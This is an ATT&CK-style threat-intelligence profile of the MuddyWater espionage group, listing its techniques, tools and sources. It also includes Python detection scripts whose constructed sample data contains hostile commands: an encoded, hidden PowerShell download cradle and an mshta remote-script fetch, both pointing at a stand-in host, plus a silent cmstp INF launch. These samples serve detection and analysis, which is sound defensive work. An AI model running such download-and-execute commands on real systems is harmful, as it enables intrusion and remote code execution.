MuddyWater

MuddyWater is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).[1] Since at least 2017, MuddyWater has targeted a range of government and private organizations across sectors, including telecommunications, local government, defense, and oil and natural gas organizations, in the Middle East, Asia, Africa, Europe, and North America.[2][3][4][5][6][7][8]

ID: G0069
Associated Groups: Earth Vetala, MERCURY, Static Kitten, Seedworm, TEMP.Zagros, Mango Sandstorm, TA450
Contributors: Ozer Sarilar, @ozersarilar, STM; Daniyal Naeem, BT Security; Marco Pedrinazzi, @pedrinazziM
Version: 5.1
Created: 18 April 2018
Last Modified: 29 August 2024

Associated Group Descriptions

Name Description
Earth Vetala [9]
MERCURY [10]
Static Kitten [10][9]
Seedworm [3][10][9]
TEMP.Zagros [11][10][9]
Mango Sandstorm [12]
TA450 [13]

Techniques Used

Domain ID Name Use
Enterprise T1047 Windows Management Instrumentation

MuddyWater has used malware that leveraged WMI for execution and querying host information.[14][4][15][7]

Enterprise T1555 Credentials from Password Stores

MuddyWater has performed credential dumping with LaZagne and other tools, including by dumping passwords saved in victim email.[2][3][9]

.003 Credentials from Web Browsers

MuddyWater has run tools including Browser64 to steal passwords saved in victim web browsers.[3][9]

Enterprise T1090 .002 Proxy: External Proxy

MuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location.[3] MuddyWater has used a series of compromised websites that victims connected to randomly to relay information to command and control (C2).[6][9]

Enterprise T1036 .005 Masquerading: Match Legitimate Name or Location

MuddyWater has disguised malicious executables and used filenames and Registry key names associated with Windows Defender.[11][15][10]

Enterprise T1190 Exploit Public-Facing Application

MuddyWater has exploited the Microsoft Exchange memory corruption vulnerability (CVE-2020-0688).[7]

Enterprise T1137 .001 Office Application Startup: Office Template Macros

MuddyWater has used a Word Template, Normal.dotm, for persistence.[6]

Enterprise T1573 .001 Encrypted Channel: Symmetric Cryptography

MuddyWater has used AES to encrypt C2 responses.[8]

Enterprise T1574 .002 Hijack Execution Flow: DLL Side-Loading

MuddyWater maintains persistence on victim networks by side-loading DLLs to trick legitimate programs into running malware.[7]

Enterprise T1140 Deobfuscate/Decode Files or Information

MuddyWater has decoded base64-encoded PowerShell, JavaScript, and VBScript.[11][16][4][8]

Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

MuddyWater has added the Registry Run key value HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding to establish persistence.[11][14][15][6][9][8]
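A detection-side illustration of the two persistence traits described above (Defender-themed names under Match Legitimate Name or Location, and the Run key value under Registry Run Keys / Startup Folder), added here as an example and not taken from any cited report or from MuddyWater tooling. It scores Sysmon Event ID 13 registry writes; the field names (Image, TargetObject, Details) are Sysmon's, while the records, the weights, the threshold and the list of launcher binaries are this example's own assumptions. The launcher check also catches a Run value that starts rundll32.exe with a DLL, the pattern listed under Rundll32 further down.

```python
"""Triage Sysmon Event ID 13 (RegistryEvent: value set) records for Run-key
persistence of the kind described on this page. Field names follow Sysmon
(Image, TargetObject, Details); the sample records are constructed, and the
weights/threshold are this example's own choices, not published detection logic."""
from __future__ import annotations

import re

# HKU\<SID>\Software\...\Run\<value> (Sysmon renders HKCU as HKU\<SID>) or HKLM\SOFTWARE\...
RUN_KEY_RE = re.compile(
    r"\\Software\\(?:Wow6432Node\\)?Microsoft\\Windows\\CurrentVersion\\(Run|RunOnce)\\",
    re.IGNORECASE,
)
# Proxy/script hosts this page ties to MuddyWater launches (rundll32 from a Run key; mshta, powershell, wscript elsewhere).
LAUNCHER_RE = re.compile(r"\b(rundll32|mshta|powershell|pwsh|wscript|cscript|cmstp)(\.exe)?\b", re.IGNORECASE)
# A Defender-themed value name is only plausible when its data points into system/program directories.
DEFENDER_NAME_RE = re.compile(r"defender|securityhealth|msmpeng|windefend", re.IGNORECASE)
TRUSTED_PATH_RE = re.compile(
    r'^"?(?:C:\\Windows\\|%windir%\\|%SystemRoot%\\|C:\\Program Files(?: \(x86\))?\\|%ProgramFiles%\\)',
    re.IGNORECASE,
)
# Value name documented on this page; assumption: matched verbatim, case-insensitively.
KNOWN_BAD_VALUE_NAMES = {"systemtextencoding"}
SCRIPT_HOST_WRITERS = ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe")


def value_name(target_object: str) -> str:
    return target_object.rsplit("\\", 1)[-1]


def score_event(ev: dict) -> tuple[int, list[str]]:
    """Return (score, reasons). Score 0 means the write is not to a Run/RunOnce key."""
    target = ev.get("TargetObject", "")
    m = RUN_KEY_RE.search(target)
    if not m:
        return 0, []
    name, data = value_name(target), ev.get("Details", "")
    writer = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    score, reasons = 1, [f"value written under {m.group(1)}"]
    if name.lower() in KNOWN_BAD_VALUE_NAMES:
        score += 5
        reasons.append(f"known value name {name}")
    if LAUNCHER_RE.search(data):
        score += 3
        reasons.append("data launches a script/proxy host")
    if DEFENDER_NAME_RE.search(name) and not TRUSTED_PATH_RE.match(data):
        score += 3
        reasons.append("Defender-themed name pointing outside trusted paths")
    if writer in SCRIPT_HOST_WRITERS:
        score += 2
        reasons.append(f"written by {writer}")
    return score, reasons


def triage(events: list[dict], threshold: int = 4) -> list[tuple[int, str, list[str]]]:
    """Events scoring at or above threshold, highest score first."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((score, value_name(ev["TargetObject"]), reasons))
    return sorted(hits, key=lambda h: -h[0])


SID = r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"
SAMPLE_EVENTS = [  # constructed records, not real telemetry
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": SID + r"\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding",
     "Details": r"rundll32.exe C:\Users\alice\AppData\Roaming\stage.dll,Start"},
    {"Image": r"C:\Windows\explorer.exe",
     "TargetObject": SID + r"\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
     "Details": r"%windir%\system32\SecurityHealthSystray.exe"},
    {"Image": r"C:\Windows\System32\wscript.exe",
     "TargetObject": SID + r"\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdate",
     "Details": r"mshta.exe C:\Users\alice\AppData\Roaming\update.hta"},
]

if __name__ == "__main__":
    for score, name, reasons in triage(SAMPLE_EVENTS):
        print(f"{score:2d} {name}: {'; '.join(reasons)}")
```

Two of the four constructed records survive the threshold: the SystemTextEncoding write from powershell.exe and the Defender-named value that starts mshta.exe from a roaming profile; the genuine SecurityHealth and OneDrive entries score only the baseline point for touching a Run key.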

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

MuddyWater has used PowerShell for execution.[11][16][14][3][4][15][6][9][7][8]

.003 Command and Scripting Interpreter: Windows Command Shell

MuddyWater has used a custom tool for creating reverse shells.[3]

.005 Command and Scripting Interpreter: Visual Basic

MuddyWater has used VBScript files to execute its POWERSTATS payload, as well as macros.[11][16][14][3][4][5][6][9][8]

.006 Command and Scripting Interpreter: Python

MuddyWater has developed tools in Python including Out1.[9]

.007 Command and Scripting Interpreter: JavaScript

MuddyWater has used JavaScript files to execute its POWERSTATS payload.[4][11][7]

Enterprise T1104 Multi-Stage Channels

MuddyWater has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back.[15]

Enterprise T1562 .001 Impair Defenses: Disable or Modify Tools

MuddyWater can disable the system's local proxy settings.[9]

Enterprise T1203 Exploitation for Client Execution

MuddyWater has exploited the Office vulnerability CVE-2017-0199 for execution.[5]

Enterprise T1113 Screen Capture

MuddyWater has used malware that can capture screenshots of the victim’s machine.[14]

Enterprise T1071 .001 Application Layer Protocol: Web Protocols

MuddyWater has used HTTP for C2 communications.[5][9]

Enterprise T1560 .001 Archive Collected Data: Archive via Utility

MuddyWater has used the native Windows cabinet creation tool, makecab.exe, likely to compress stolen data to be uploaded.[3]

Enterprise T1003 .001 OS Credential Dumping: LSASS Memory

MuddyWater has performed credential dumping with Mimikatz and procdump64.exe.[2][3][9]

.004 OS Credential Dumping: LSA Secrets

MuddyWater has performed credential dumping with LaZagne.[2][3]

.005 OS Credential Dumping: Cached Domain Credentials

MuddyWater has performed credential dumping with LaZagne.[2][3]

Enterprise T1074 .001 Data Staged: Local Data Staging

MuddyWater has stored a decoy PDF file within a victim's %temp% folder.[8]

Enterprise T1132 .001 Data Encoding: Standard Encoding

MuddyWater has used tools to encode C2 communications including Base64 encoding.[5][9]

Enterprise T1083 File and Directory Discovery

MuddyWater has used malware that checked if the ProgramData folder had folders or files with the keywords "Kasper," "Panda," or "ESET."[14]

Enterprise T1552 .001 Unsecured Credentials: Credentials In Files

MuddyWater has run a tool that steals passwords saved in victim email.[3]

Enterprise T1027 .003 Obfuscated Files or Information: Steganography

MuddyWater has stored obfuscated JavaScript code in an image file named temp.jpg.[4]

.004 Obfuscated Files or Information: Compile After Delivery

MuddyWater has used the .NET csc.exe tool to compile executables from downloaded C# code.[4]

.010 Obfuscated Files or Information: Command Obfuscation

MuddyWater has used Daniel Bohannon’s Invoke-Obfuscation framework and obfuscated PowerShell scripts.[2][17] The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands.[2][11][14][15][5][9][8]
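The Base64 layering mentioned under Deobfuscate/Decode Files or Information and again here is easiest to understand by unwrapping a sample. The following script, added as an example (not code from the page or from the group's tooling), peels a PowerShell -EncodedCommand blob (Base64 over UTF-16LE) and then a FromBase64String stage inside it, and lists plain-text indicators found across the layers. The three-stage command line is constructed inside the block, and the indicator list and recursion depth are this example's choices.

```python
"""Unwrap the layered Base64 this page attributes to MuddyWater: a PowerShell
-EncodedCommand blob (Base64 over UTF-16LE) whose payload itself decodes a
FromBase64String(...) stage. The sample command line is built inline from a
constructed inner script; the indicator list is this example's own choice."""
import base64
import binascii
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand: -e, -ec, -en, -enc, ... -encodedcommand.
ENC_FLAG_RE = re.compile(r"(?:^|\s)-e(?:c|n\w*)?\b\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)
B64_CALL_RE = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)", re.IGNORECASE)
INDICATORS = ("-nop", "hidden", "bypass", "iex", "invoke-expression",
              "downloadstring", "webclient", "invoke-webrequest", "mshta")


def bytes_to_text(raw: bytes) -> str:
    """UTF-16LE if the odd bytes are mostly NUL (ASCII text widened), else UTF-8."""
    if len(raw) >= 2 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


def decode_layers(text: str, max_depth: int = 4) -> list:
    """Peel -EncodedCommand and FromBase64String layers; outermost decoded layer first."""
    layers, current = [], text
    for _ in range(max_depth):
        try:
            m = ENC_FLAG_RE.search(current)
            if m:
                current = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
            else:
                m = B64_CALL_RE.search(current)
                if not m:
                    break
                current = bytes_to_text(base64.b64decode(m.group(1), validate=True))
        except (binascii.Error, UnicodeDecodeError):
            break  # not valid Base64/UTF-16 after all: stop rather than report garbage
        layers.append(current)
    return layers


def strip_blobs(text: str) -> str:
    """Blank out long Base64 runs so indicator matching only sees real text."""
    return re.sub(r"[A-Za-z0-9+/=]{40,}", "<b64>", text)


def triage(cmdline: str) -> dict:
    layers = decode_layers(cmdline)
    haystack = "\n".join(strip_blobs(s) for s in [cmdline] + layers).lower()
    return {"layers": layers, "indicators": sorted(i for i in INDICATORS if i in haystack)}


# Constructed three-stage sample: inner download cradle -> Base64 stage -> -enc command line.
INNER_PS = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
STAGE2 = ("[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('%s')) | IEX"
          % base64.b64encode(INNER_PS.encode()).decode())
CMDLINE = "powershell.exe -nop -w hidden -enc " + base64.b64encode(STAGE2.encode("utf-16-le")).decode()

if __name__ == "__main__":
    result = triage(CMDLINE)
    for depth, layer in enumerate(result["layers"], 1):
        print(f"layer {depth}: {layer}")
    print("indicators:", ", ".join(result["indicators"]))
```

The encoding guess in bytes_to_text matters in practice: -EncodedCommand is always UTF-16LE, but a FromBase64String stage may have been produced with UTF8 or Unicode GetString, and decoding with the wrong one yields either NUL-riddled text or a UnicodeDecodeError, which the loop treats as the end of the chain instead of reporting garbage.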

Enterprise T1548 .002 Abuse Elevation Control Mechanism: Bypass User Account Control

MuddyWater uses various techniques to bypass UAC.[4]

Enterprise T1204 .001 User Execution: Malicious Link

MuddyWater has distributed URLs in phishing e-mails that link to lure documents.[10][9][13]

.002 User Execution: Malicious File

MuddyWater has attempted to get users to open malicious PDF attachments, and to enable macros and launch malicious Microsoft Word documents, delivered via spearphishing emails.[2][11][14][15][5][6][10][9][7][8][13]

Enterprise T1218 .003 System Binary Proxy Execution: CMSTP

MuddyWater has used CMSTP.exe and a malicious INF to execute its POWERSTATS payload.[11]

.005 System Binary Proxy Execution: Mshta

MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution.[11][14]

.011 System Binary Proxy Execution: Rundll32

MuddyWater has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll.[14]
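Taken together, the three proxy-execution binaries above (CMSTP, Mshta, Rundll32) plus the makecab.exe staging noted under Archive via Utility share one telemetry source: process creation. The following heuristics, added as an example rather than taken from the page's references, run over Sysmon Event ID 1 style records (Image, CommandLine, ParentImage) and also flag Office parents spawning these binaries, the macro path described under Malicious File. The events, the path list and the flag combinations are this example's assumptions; a real deployment would tune them against the environment's baseline.

```python
"""Process-creation heuristics (Sysmon EID 1 / Security 4688 fields Image,
CommandLine, ParentImage) for the proxy-execution binaries this page ties to
MuddyWater: cmstp.exe driving a malicious INF, mshta.exe running inline script
or a dropped .hta, rundll32.exe loading a DLL from a user-writable path, and
makecab.exe staging data from a shell. Sample events are constructed."""
import re

USER_WRITABLE_RE = re.compile(r"\\Users\\|\\ProgramData\\|\\Temp\\|\\AppData\\|%temp%|%appdata%", re.IGNORECASE)
INLINE_SCRIPT_RE = re.compile(r"\b(?:javascript|vbscript):", re.IGNORECASE)
URL_RE = re.compile(r"https?://", re.IGNORECASE)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
PROXY_BINARIES = {"cmstp.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
                  "powershell.exe", "wscript.exe", "cscript.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(ev: dict) -> list:
    """Reasons an event is suspicious; an empty list means nothing here fired."""
    image, parent = basename(ev.get("Image", "")), basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    low, tokens = cmd.lower(), cmd.lower().split()
    reasons = []
    if image == "cmstp.exe":
        # /ni (no icon) /s (silent) with an INF outside system/program directories is the proxy-execution pattern
        if {"/ni", "/s"} <= set(tokens):
            reasons.append("cmstp silent no-icon install")
        if ".inf" in low and USER_WRITABLE_RE.search(cmd):
            reasons.append("INF from user-writable path")
    elif image == "mshta.exe":
        if INLINE_SCRIPT_RE.search(low):
            reasons.append("mshta inline script")
        if URL_RE.search(low):
            reasons.append("mshta remote URL")
        if ".hta" in low and USER_WRITABLE_RE.search(cmd):
            reasons.append(".hta from user-writable path")
    elif image == "rundll32.exe":
        if INLINE_SCRIPT_RE.search(low):
            reasons.append("rundll32 inline script")
        if USER_WRITABLE_RE.search(cmd):
            reasons.append("rundll32 DLL from user-writable path")
        if len(tokens) > 1 and ".dll" not in low:
            reasons.append("rundll32 argument is not a .dll")
    elif image == "makecab.exe":
        if parent in SHELL_PARENTS and USER_WRITABLE_RE.search(cmd):
            reasons.append(f"makecab staging in user-writable path from {parent}")
    if parent in OFFICE_PARENTS and image in PROXY_BINARIES:
        reasons.append(f"spawned by Office application {parent}")
    return reasons


def triage(events: list) -> list:
    """(index, image, reasons) for every event with at least one reason."""
    out = []
    for i, ev in enumerate(events):
        reasons = evaluate(ev)
        if reasons:
            out.append((i, basename(ev.get("Image", "")), reasons))
    return out


SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": 'mshta.exe vbscript:Close(Execute("GetObject(""script:http://example.invalid/a"")"))'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\cmstp.exe",
     "CommandLine": r"cmstp.exe /ni /s C:\Users\alice\AppData\Local\Temp\net.inf"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\alice\AppData\Roaming\stage.dll,Start"},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\makecab.exe",
     "CommandLine": r"makecab.exe C:\Users\alice\AppData\Local\Temp\export.txt C:\Users\alice\AppData\Local\Temp\export.cab"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\help.hta"'},
]

if __name__ == "__main__":
    for i, image, reasons in triage(SAMPLE_EVENTS):
        print(f"event {i} {image}: {'; '.join(reasons)}")
```

The two benign-looking records (shell32.dll through rundll32 from Explorer, a vendor .hta under Program Files) produce no reasons, which is the point of combining the binary name with where its argument lives and who spawned it rather than alerting on the binary alone.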

Enterprise T1082 System Information Discovery

MuddyWater has used malware that can collect the victim’s OS version and machine name.[14][15][6][9][8]

Enterprise T1033 System Owner/User Discovery

MuddyWater has used malware that can collect the victim’s username.[14][9]

Enterprise T1049 System Network Connections Discovery

MuddyWater has used a PowerShell backdoor to check for Skype connections on the target machine.[9]

Enterprise T1016 System Network Configuration Discovery

MuddyWater has used malware to collect the victim’s IP address and domain name.[14]

Enterprise T1102 .002 Web Service: Bidirectional Communication

MuddyWater has used web services including OneHub to distribute remote access tools.[10]

Enterprise T1583 .006 Acquire Infrastructure: Web Services

MuddyWater has used file sharing services including OneHub, Sync, and TeraBox to distribute tools.[10][9][13]

Enterprise T1588 .002 Obtain Capabilities: Tool

MuddyWater has used legitimate tools ConnectWise, RemoteUtilities, and SimpleHelp to gain access to the target environment.[10][18]

Enterprise T1087 .002 Account Discovery: Domain Account

MuddyWater has run net user /domain via cmd.exe to enumerate domain users.[9]

Enterprise T1518 Software Discovery

MuddyWater has used a PowerShell backdoor to check for Skype connectivity on the target machine.[9]

.001 Security Software Discovery

MuddyWater has used malware to check running processes against a hard-coded list of security tools often used by malware researchers.[14]

Enterprise T1105 Ingress Tool Transfer

MuddyWater has used malware that can upload additional files to the victim’s machine.[14][4][6][9]

Enterprise T1057 Process Discovery

MuddyWater has used malware to obtain a list of running processes on the system.[14][5]

Enterprise T1559 .001 Inter-Process Communication: Component Object Model

MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook.[14][5][7]

.002 Inter-Process Communication: Dynamic Data Exchange

MuddyWater has used malware that can execute PowerShell scripts via DDE.[14]

Enterprise T1210 Exploitation of Remote Services

MuddyWater has exploited the Microsoft Netlogon vulnerability (CVE-2020-1472).[7]

Enterprise T1219 Remote Access Software

MuddyWater has used legitimate applications ScreenConnect, AteraAgent and SimpleHelp to manage systems remotely and move laterally.[9][10][13][18]

Enterprise T1041 Exfiltration Over C2 Channel

MuddyWater has used C2 infrastructure to receive exfiltrated data.[6]

Enterprise T1566 .001 Phishing: Spearphishing Attachment

MuddyWater has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments to recipients.[2][11][14][5][10][9][7][13]

.002 Phishing: Spearphishing Link

MuddyWater has sent targeted spearphishing e-mails with malicious links.[10][9][13]

Enterprise T1053 .005 Scheduled Task/Job: Scheduled Task

MuddyWater has used scheduled tasks to establish persistence.[6]

Software

ID Name References Techniques
S0591 ConnectWise [10][9] Command and Scripting Interpreter: PowerShell, Screen Capture, Video Capture
S0488 CrackMapExec [19][3] Windows Management Instrumentation, Use Alternate Authentication Material: Pass the Hash, Modify Registry, Command and Scripting Interpreter: PowerShell, Password Policy Discovery, OS Credential Dumping: Security Account Manager, OS Credential Dumping: NTDS, OS Credential Dumping: LSA Secrets, File and Directory Discovery, Brute Force: Password Spraying, Brute Force: Password Guessing, Brute Force, Permission Groups Discovery: Domain Groups, System Information Discovery, System Network Connections Discovery, System Network Configuration Discovery, Network Share Discovery, Account Discovery: Domain Account, Remote System Discovery, Scheduled Task/Job: At
S0363 Empire [19] Windows Management Instrumentation, Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay, Event Triggered Execution: Accessibility Features, Credentials from Password Stores: Credentials from Web Browsers, Use Alternate Authentication Material: Pass the Hash, Create or Modify System Process: Windows Service, Create Account: Local Account, Create Account: Domain Account, Clipboard Data, Encrypted Channel: Asymmetric Cryptography, Hijack Execution Flow: Path Interception by Unquoted Path, Hijack Execution Flow: Path Interception by Search Order Hijacking, Hijack Execution Flow: Path Interception by PATH Environment Variable, Hijack Execution Flow: Dylib Hijacking, Hijack Execution Flow: DLL Search Order Hijacking, Trusted Developer Utilities Proxy Execution: MSBuild, Boot or Logon Autostart Execution: Security Support Provider, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Boot or Logon Autostart Execution: Shortcut Modification, Command and Scripting Interpreter: PowerShell, Command and Scripting Interpreter: Windows Command Shell, Command and Scripting Interpreter, Domain Trust Discovery, Domain or Tenant Policy Modification: Group Policy Modification, Screen Capture, Application Layer Protocol: Web Protocols, Archive Collected Data, OS Credential Dumping: LSASS Memory, File and Directory Discovery, Unsecured Credentials: Credentials In Files, Unsecured Credentials: Private Keys, Native API, Exploitation for Privilege Escalation, Browser Information Discovery, Obfuscated Files or Information: Command Obfuscation, Abuse Elevation Control Mechanism: Bypass User Account Control, Email Collection: Local Email Collection, Indicator Removal: Timestomp, Steal or Forge Kerberos Tickets: Kerberoasting, Steal or Forge Kerberos Tickets: Golden Ticket, Steal or Forge Kerberos Tickets: Silver Ticket, System Information Discovery, System Owner/User Discovery, System Services: Service Execution, System Network Connections Discovery, System Network Configuration Discovery, Group Policy Discovery, Network Share Discovery, Network Sniffing, Web Service: Bidirectional Communication, Network Service Discovery, Automated Collection, Automated Exfiltration, Video Capture, Access Token Manipulation: SID-History Injection, Access Token Manipulation, Access Token Manipulation: Create Process with Token, Account Discovery: Domain Account, Account Discovery: Local Account, Software Discovery: Security Software Discovery, Ingress Tool Transfer, Input Capture: Keylogging, Input Capture: Credential API Hooking, Process Discovery, Process Injection, Remote Services: Distributed Component Object Model, Remote Services: SSH, Exploitation of Remote Services, Exfiltration Over C2 Channel, Exfiltration Over Web Service: Exfiltration to Code Repository, Exfiltration Over Web Service: Exfiltration to Cloud Storage, Scheduled Task/Job: Scheduled Task
S0250 Koadic [6][19] Windows Management Instrumentation, Data from Local System, Clipboard Data, Encrypted Channel: Asymmetric Cryptography, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: Visual Basic, Command and Scripting Interpreter: PowerShell, Command and Scripting Interpreter: Windows Command Shell, Application Layer Protocol: Web Protocols, OS Credential Dumping: Security Account Manager, OS Credential Dumping: NTDS, File and Directory Discovery, Abuse Elevation Control Mechanism: Bypass User Account Control, System Binary Proxy Execution: Mshta, System Binary Proxy Execution: Regsvr32, System Binary Proxy Execution: Rundll32, System Information Discovery, System Owner/User Discovery, System Services: Service Execution, System Network Configuration Discovery, Network Share Discovery, Network Service Discovery, Ingress Tool Transfer, Process Injection: Dynamic-link Library Injection, Remote Services: Remote Desktop Protocol, Hide Artifacts: Hidden Window, Scheduled Task/Job: Scheduled Task
S0349 LaZagne [3][19] Credentials from Password Stores: Windows Credential Manager, Credentials from Password Stores: Credentials from Web Browsers, Credentials from Password Stores, Credentials from Password Stores: Keychain, OS Credential Dumping: LSA Secrets, OS Credential Dumping: /etc/passwd and /etc/shadow, OS Credential Dumping: LSASS Memory, OS Credential Dumping: Cached Domain Credentials, OS Credential Dumping: Proc Filesystem, Unsecured Credentials: Credentials In Files
S0002 Mimikatz [2][19] Credentials from Password Stores, Credentials from Password Stores: Credentials from Web Browsers, Credentials from Password Stores: Windows Credential Manager, Rogue Domain Controller, Use Alternate Authentication Material: Pass the Hash, Use Alternate Authentication Material: Pass the Ticket, Boot or Logon Autostart Execution: Security Support Provider, OS Credential Dumping: DCSync, OS Credential Dumping: Security Account Manager, OS Credential Dumping: LSASS Memory, OS Credential Dumping: LSA Secrets, Unsecured Credentials: Private Keys, Steal or Forge Kerberos Tickets: Golden Ticket, Steal or Forge Kerberos Tickets: Silver Ticket, Steal or Forge Authentication Certificates, Access Token Manipulation: SID-History Injection, Account Manipulation
S1047 Mori [7] Modify Registry, Deobfuscate/Decode Files or Information, Application Layer Protocol: Web Protocols, Application Layer Protocol: DNS, Data Obfuscation: Junk Data, Data Encoding: Standard Encoding, Query Registry, Indicator Removal: File Deletion, System Binary Proxy Execution: Regsvr32
S0594 Out1 [9] Data from Local System, Command and Scripting Interpreter: Windows Command Shell, Application Layer Protocol: Web Protocols, Obfuscated Files or Information, Email Collection: Local Email Collection
S0194 PowerSploit [19] Windows Management Instrumentation, Credentials from Password Stores: Windows Credential Manager, Data from Local System, Create or Modify System Process: Windows Service, Hijack Execution Flow: Path Interception by PATH Environment Variable, Hijack Execution Flow: Path Interception by Unquoted Path, Hijack Execution Flow: DLL Search Order Hijacking, Hijack Execution Flow: Path Interception by Search Order Hijacking, Reflective Code Loading, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Boot or Logon Autostart Execution: Security Support Provider, Command and Scripting Interpreter: PowerShell, Domain Trust Discovery, Screen Capture, OS Credential Dumping: LSASS Memory, Unsecured Credentials: Credentials in Registry, Unsecured Credentials: Group Policy Preferences, Query Registry, Obfuscated Files or Information: Indicator Removal from Tools, Obfuscated Files or Information: Command Obfuscation, Steal or Forge Kerberos Tickets: Kerberoasting, Access Token Manipulation, Account Discovery: Local Account, Input Capture: Keylogging, Process Discovery, Process Injection: Dynamic-link Library Injection, Audio Capture, Scheduled Task/Job: Scheduled Task
S0223 POWERSTATS [2][11][4][3][5] Windows Management Instrumentation, Data from Local System, Proxy: External Proxy, Masquerading: Masquerade Task or Service, Encrypted Channel: Asymmetric Cryptography, Deobfuscate/Decode Files or Information, Command and Scripting Interpreter: PowerShell, Command and Scripting Interpreter: Visual Basic, Command and Scripting Interpreter: JavaScript, Impair Defenses: Disable or Modify Tools, Screen Capture, Data Encoding: Standard Encoding, Obfuscated Files or Information: Command Obfuscation, Obfuscated Files or Information: Binary Padding, Indicator Removal: File Deletion, System Binary Proxy Execution: Mshta, System Information Discovery, System Owner/User Discovery, System Network Configuration Discovery, Account Discovery: Local Account, Software Discovery: Security Software Discovery, Ingress Tool Transfer, Process Discovery, Inter-Process Communication: Component Object Model, Inter-Process Communication: Dynamic Data Exchange, Scheduled Task/Job: Scheduled Task, Scheduled Transfer
S1046 PowGoop [7] Masquerading, Masquerading: Match Legitimate Name or Location, Encrypted Channel, Hijack Execution Flow: DLL Side-Loading, Deobfuscate/Decode Files or Information, Command and Scripting Interpreter: PowerShell, Application Layer Protocol: Web Protocols, Data Encoding: Non-Standard Encoding
S0592 RemoteUtilities [9] Screen Capture, File and Directory Discovery, System Binary Proxy Execution: Msiexec, Ingress Tool Transfer
S0450 SHARPSTATS [19] Command and Scripting Interpreter: PowerShell, Obfuscated Files or Information: Command Obfuscation, System Information Discovery, System Owner/User Discovery, System Time Discovery, System Network Configuration Discovery, Ingress Tool Transfer
S1035 Small Sieve [7][20] Masquerading: Match Legitimate Name or Location, Encrypted Channel: Asymmetric Cryptography, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: Windows Command Shell, Command and Scripting Interpreter: Python, Application Layer Protocol: Web Protocols, Execution Guardrails, Data Encoding: Non-Standard Encoding, Obfuscated Files or Information, System Owner/User Discovery, System Network Configuration Discovery, Web Service: Bidirectional Communication, Ingress Tool Transfer
S1037 STARWHALE [7] Data from Local System, Create or Modify System Process: Windows Service, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: Visual Basic, Command and Scripting Interpreter: Windows Command Shell, Application Layer Protocol: Web Protocols, Data Staged: Local Data Staging, Data Encoding: Standard Encoding, Obfuscated Files or Information: Encrypted/Encoded File, User Execution: Malicious File, System Information Discovery, System Owner/User Discovery, System Network Configuration Discovery, Exfiltration Over C2 Channel

References

  1. Cyber National Mission Force. (2022, January 12). Iranian intel cyber suite of malware uses open source tools. Retrieved September 30, 2022.
  2. Lancaster, T. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.
  3. Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.
